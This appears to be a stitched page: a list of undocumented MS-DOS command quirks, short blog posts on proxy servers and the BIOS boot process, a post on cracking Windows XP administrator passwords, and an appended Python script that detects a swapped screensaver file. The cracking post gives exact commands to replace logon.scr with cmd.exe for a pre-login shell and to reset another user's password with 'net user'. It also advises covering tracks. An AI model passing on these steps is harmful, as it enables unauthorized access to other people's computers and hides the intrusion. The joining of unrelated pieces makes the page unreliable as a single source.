 FORMAT /H
 ---------

In DOS 3.30 (not tested with other versions), FORMAT /H will cause the format to begin immediately after pressing Y in response to "Format another", rather than displaying "Place disk to be formatted in drive x: and press Enter" on a second and subsequent disks.

In DOS 5.0, FORMAT reports "invalid switch".

===========================================================================
 IF EXIST <dirname>\NUL <command> and IF EXIST EMMXXXX0 <command>
 ----------------------------------------------------------------

This is a handy quirk of DOS.  Installable drivers are seen as files in all directories.  You can use the if exist test to either test for the existence of a directory, with "if exist <dirname>\nul", which fails if the directory does not exist because the nul device is not found; or to test whether any driver is loaded, such as the DOS 5 or 6 EMM386 memory manager.

Caveats:  For testing NUL, you need to know the name of the directory or the driver whose existence you are testing, and this is MS-DOS specific -- it doesn't work on network drives, and may not work under DR-DOS.

Where did you learn the "EMMXXXX0" name from?  Instead of typing MEM /C, type MEM /D for the "debug" listing.

The only trouble is that IF EXIST returns true for COM3/4 and LPT2/3 even if the hardware does not exist.

===========================================================================
 Using ATTRIB to hide directories
 --------------------------------

The DOS 5.0 and 6.0 ATTRIB command can do the same thing for directories as it can for files:  ATTRIB +H <dirname>  will hide the named directory.

===========================================================================
 SWITCHES=/W
 -----------

Enables you to have the Windows 3.0 WINA20.386 file anywhere on your boot drive.  Without this you have to have it in the root directory.

This should not be used with Windows 3.1, since it appears to waste around 120K of UMBs.

===========================================================================
 FOR %%V IN (/SOMETHING)
 -----------------------

How can a batch file (without 4DOS) determine from which drive it has been started?

      Example:  C:\>a:test.bat

Now my batch should be able to find out that it is located on drive A: (not the path, only the drive!).

In a batch file, the variable %0 contains the name of the batch file as it was typed at the command line.  If you run the batch file as A:TEST.BAT, %0 will be "A:TEST.BAT".  If you have the directory on your path, and simply type TEST, then %0 will be "TEST".  The drive, path, and extension will only appear in %0 if you enter them in the command used to call the batch file (either typed at the command line, or called from another batch file).  So, you must specify the drive as part of the batch filename for this to work.

To extract the drive only from %0, use the undocumented FOR %%V in /SOMETHING command:

     set drive=
     for %%v in (/%0) do call test2 %%v
     echo Calling drive is %drive%

...where TEST2.BAT is:

     if '%drive%'=='' set drive=%1:

FOR %%V IN (/SOMETHING) DO WHATEVER will do WHATEVER twice -- the first time with %%V set to the first character in SOMETHING ("S"), the second time with all the remaining characters in SOMETHING ("OMETHING").  If SOMETHING is only a single character, WHATEVER will only be called once, with that character in %%V.  If the single character is a wildcard (? or *) that wild card will not be expanded to a set of filenames.  (The main purpose of this feature is apparently to allow inclusion of the literal characters "?" and "*" without them being expanded.)

This works in DOS 3.30 and later.

===========================================================================
 DIR,
 ----

Using a comma immediately after DIR shows ALL files, including the HIDDEN ones.

This appears only to work with DOS 5.0 and 6.0.  With 3.30, it doesn't display either IO.SYS, MSDOS.SYS (both with S, H and R attribs) or a test file with A and H attribs.

With DOS 5.0, it displayed a test file with H and A, but would not display IO.SYS or MSDOS.SYS with S, H and R.  This isn't surprising actually, since S alone (without H) will prevent inclusion of a file in a normal DIR.

Not tested with DOS 4.x.  Not supported by JP Software's 4DOS.

===========================================================================
 COPY. A:
 --------

The use of a period IMMEDIATELY after some DOS statements will work just like *.*

     Examples:  DEL.      (erase all files in current directory)
                COPY. A:  (copy all files in current directory to A:)

There may be more statements with which it works.

This is actually a documented although obscure feature, though the ability to use the period with COPY is not documented.  What is documented is the fact that "." and ".." can be used to represent the current and parent directories respectively, and these will work with many applications which can handle directory names as arguments.  In this case the "." could also be viewed as a replacement for "*.*".

===========================================================================
 DOS?=HIGH
 ---------

DOS?=HIGH in CONFIG.SYS with DOS 6.0 will prompt you whether to load the DOS kernel high (into the HMA) or not.

===========================================================================
 INSTALLHIGH
 -----------
In DOS 6.0, there is an undocumented CONFIG.SYS command called INSTALLHIGH= which works just like INSTALL= but loads the TSR high (into upper memory).

The only drawback to this is that MemMaker will not touch INSTALLHIGH lines during the optimizing process.  It just takes it as it is currently.  But then again, INSTALL= is ignored too.  All in all, INSTALL and INSTALLHIGH really are commands to set up manually by the user, and are not really recommended for normal use.  Load TSRs at the beginning of AUTOEXEC.BAT (and using LOADHIGH if desired).

       Example:

       DOS=HIGH,UMB
       DEVICE=C:\DOS\HIMEM.SYS
       DEVICE=C:\DOS\EMM386.EXE NOEMS
       INSTALLHIGH=C:\DOS\SHARE.EXE

===========================================================================
 Using : for batch file comments
 -------------------------------

DOS uses a leading : to indicate a label in a batch file.  If the next character following the : is a space or other non-alphanumeric character, then DOS will decide it's an invalid label and skip to the next line, performing no further action.  Faster batch file processing is achieved using this method for comments instead of REM commands.

===========================================================================
 REM in lines with pipes or redirection
 --------------------------------------

For example:  REM echo y | del *.*
Problems are encountered when trying to REM out an "echo y | del *.*" line in a batch file.  The problem appears to only occur if there is a pipe or redirection in the REMed out line, which shows that DOS first reads the entire line and processes pipes and redirections first, and then goes back to find out what to do with them in the line.  It's actually doing what it thinks you've told it:  Piping the output of REM to DEL.  Since REM has no output, DEL hangs, waiting for the answer to its question.

===========================================================================
 Delimiter character
 -------------------

Prior to DOS 5.0, there was an undocumented DOS function that would allow you to set the DOS option delimiter character to something else, like a dash (-).  Once you did this, you could use either \ or / in PATH specifications.

DOS 5.0 removed the function to set the option delimiter, but retained the function to query what it currently is.

Sunday

Secure Computer: What is a Proxy Server?

How/What is a Proxy Server?

A proxy server is a kind of buffer between your computer and the Internet resources you are accessing. The data you request comes to the proxy first, and only then does the proxy transmit it to you. I know many are looking for IP maskers or scramblers, but honestly, it ain't real easy, for the simple fact that any website you visit needs your IP to send the info packets to. If it's scrambled, you will get a lot of errors and crazy redirects :P My solution? Read on... For a good list of proxy servers, try Multiproxy.

Thursday

Secure Computer: What is BIOS /Hard Drive

 Basic hard drive/BIOS

As soon as you flip that switch, your CPU starts executing shit located at F000:FFF0. This area contains the BIOS, Basic Input/Output System. This code is written in assembly and is stored in chips called EPROMs in your computer. This code will perform something known as POST, Power On Self Test. This checks for installed devices and checks if they all work. In particular it checks for the video card and runs the video BIOS, usually located at C000h. Next it checks for other ROMs to see if they have installed BIOSes. Usually it then finds and executes the hard drive BIOS located at C8000h. Then it starts something like a "system inventory" where it checks for other installed devices and tests them. It does some more stuff that's all basically useless for us right now, until it finally transfers control over to the operating system. That's the part that we're interested in. Back in the old days, only one OS was installed on a computer. If you bought a certain computer, you could only run the OS that was made for it. Nothing else. Obviously that wasn't such a good thing, as you would have to buy a new computer if you wanted a different OS, so BIOS makers came up with the Boot Sector. In case you didn't know yet, a sector is the smallest area your hard drive can access. According to the ATA standards each sector is exactly 512 bytes. However, ATA standards only apply to hard drives; things like floppies can use whatever they want. Knowing this we can move on to the boot sector.

Tuesday

Secure Computer: How to Crack Admin Password


How to hack Windows XP Admin Passwords

This hack will only work if the person that owns the machine
has no intelligence. This is how it works:
When you or anyone installs Windows XP for the first time, you're
asked to put in your username and up to five others.
Now, unbeknownst to a lot of other people, this is the only place in
Windows XP that you can password the default Administrator Diagnostic
Account. This means that to bypass most administrators' accounts
on Windows XP all you have to do is boot to safe mode by pressing F8
during boot up and choosing it. Log into the Administrator Account
and create your own or change the password on the current Account.
This only works if the user on setup specified a password for the
Administrator Account.
This has worked for me on both Windows XP Home and Pro.
-----------------------------------------------------------------------------
Now this one seems to be machine-dependent; it works randomly (don't know why).

If you log into a limited account on your target machine and open up a DOS prompt,
then enter this set of commands exactly:
(this appeared on www.astalavista.com a few days ago, but I found that it wouldn't work
on the welcome screen of a normal booted machine)
-----------------------------------------------------------------------------

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backs up logon.scr
copy cmd.exe temphack\cmd.exe *backs up cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
-----------------------------------------------------------------------------
What you have just done is back up the command program
and the screen saver file, then change things so that when the machine starts the
screen saver you get an unprotected DOS prompt without logging into XP.
Once this happens, enter this command, minus the quotes:
"net user <admin account name here> password"
If the Administrator Account is called Frank and you want the password blah, enter this:
"net user Frank blah"
and this changes the password on Frank's machine to blah and you're in.
Have fun
P.S.: don't forget to copy the contents of temphack back into the system32 dir to cover tracks
Any updates, Errors, Suggestions or just general comments mail them to either
Estyle89@hotmail.com
jaoibh@hotmail.com   
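
A defender-side check for the file swap described in this post, added here as an example and not part of the original text: it reports any .scr file in a system directory whose content matches the command shell, and notes when cmd.exe itself is gone. The function names, the baseline hash set and the constructed sample directory are assumptions made for the demonstration.

```python
import hashlib
import tempfile
from pathlib import Path

# Constructed stand-ins for the real binaries; any distinct byte strings work.
SHELL_BYTES = b"MZ constructed cmd.exe stand-in"
SAVER_BYTES = b"MZ constructed logon.scr stand-in"


def sha256_of(path):
    """Hash a file in chunks so large binaries are not loaded whole."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def audit_screensavers(system_dir, baseline_shell_hashes, shell_name="cmd.exe"):
    """Return findings for .scr files whose content matches the command shell."""
    system_dir = Path(system_dir)
    shell_hashes = set(baseline_shell_hashes)  # hashes from a trusted baseline
    findings = []
    shell = system_dir / shell_name
    if shell.is_file():
        shell_hashes.add(sha256_of(shell))
    else:
        # The rename in the post leaves no cmd.exe behind in this directory.
        findings.append((shell_name, "missing"))
    for path in sorted(system_dir.iterdir()):
        if path.is_file() and path.suffix.lower() == ".scr":
            if sha256_of(path) in shell_hashes:
                findings.append((path.name, "same content as " + shell_name))
    return findings


def build_sample_dir(swapped):
    """Create a constructed directory: clean, or with the shell renamed over the saver."""
    root = Path(tempfile.mkdtemp())
    if swapped:
        (root / "logon.scr").write_bytes(SHELL_BYTES)
    else:
        (root / "cmd.exe").write_bytes(SHELL_BYTES)
        (root / "logon.scr").write_bytes(SAVER_BYTES)
    return root


if __name__ == "__main__":
    baseline = {hashlib.sha256(SHELL_BYTES).hexdigest()}
    for swapped in (False, True):
        print(swapped, audit_screensavers(build_sample_dir(swapped), baseline))
```

On a real host, pass the system32 path and cmd.exe hashes taken from a trusted installation image, so the check still works when the shell has been renamed away.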
  